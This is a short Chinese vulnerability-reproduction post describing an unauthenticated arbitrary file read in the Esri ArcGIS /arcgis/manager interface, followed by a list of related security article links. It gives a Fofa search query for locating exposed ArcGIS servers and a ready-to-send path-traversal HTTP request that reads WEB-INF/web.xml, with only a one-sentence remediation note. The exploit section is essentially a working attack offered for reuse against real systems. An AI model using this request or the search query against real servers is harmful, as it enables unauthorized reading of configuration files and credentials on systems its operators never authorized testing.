ArcGIS地理空间平台 manager 任意文件读取漏洞复现

0x01 产品描述:

ArcGIS ‌是一个综合的地理空间平台,由Esri开发,旨在为专业人士和组织提供全面的地理信息系统(GIS)功能。ArcGIS通过集成和连接地理环境中的数据,支持创建、管理、分析、映射和共享各种类型的数据,从而帮助组织在决策制定中占据领先地位‌。
0x02 漏洞描述:

ArcGIS地理空间平台 /arcgis/manager接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
0x03 搜索语句:

Fofa:app="esri-ArcGIS"


0x04 漏洞复现:

GET /arcgis/manager/3370/js/../WEB-INF/web.xml HTTP/1.1
Host: your-ip


0x05 修复建议:

在处理客户端输入的参数时,进行严格的验证和过滤,防止未授权的文件访问。

相关推荐
独行soc43 分钟前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍08-基于时间延迟的SQL注入(Time-Based SQL Injection)
数据库·sql·安全·渗透测试·漏洞挖掘
Clockwiseee2 小时前
php伪协议
windows·安全·web安全·网络安全
黑客Ash2 小时前
安全算法基础(一)
算法·安全
云云3212 小时前
搭建云手机平台的技术要求?
服务器·线性代数·安全·智能手机·矩阵
云云3212 小时前
云手机有哪些用途?云手机选择推荐
服务器·线性代数·安全·智能手机·矩阵
xcLeigh3 小时前
网络安全 | 防火墙的工作原理及配置指南
安全·web安全
白乐天_n3 小时前
腾讯游戏安全移动赛题Tencent2016A
安全·游戏
光路科技4 小时前
八大网络安全策略:如何防范物联网(IoT)设备带来的安全风险
物联网·安全·web安全
saynaihe5 小时前
安全地使用 Docker 和 Systemctl 部署 Kafka 的综合指南
运维·安全·docker·容器·kafka
星河梦瑾5 小时前
SpringBoot相关漏洞学习资料
java·经验分享·spring boot·安全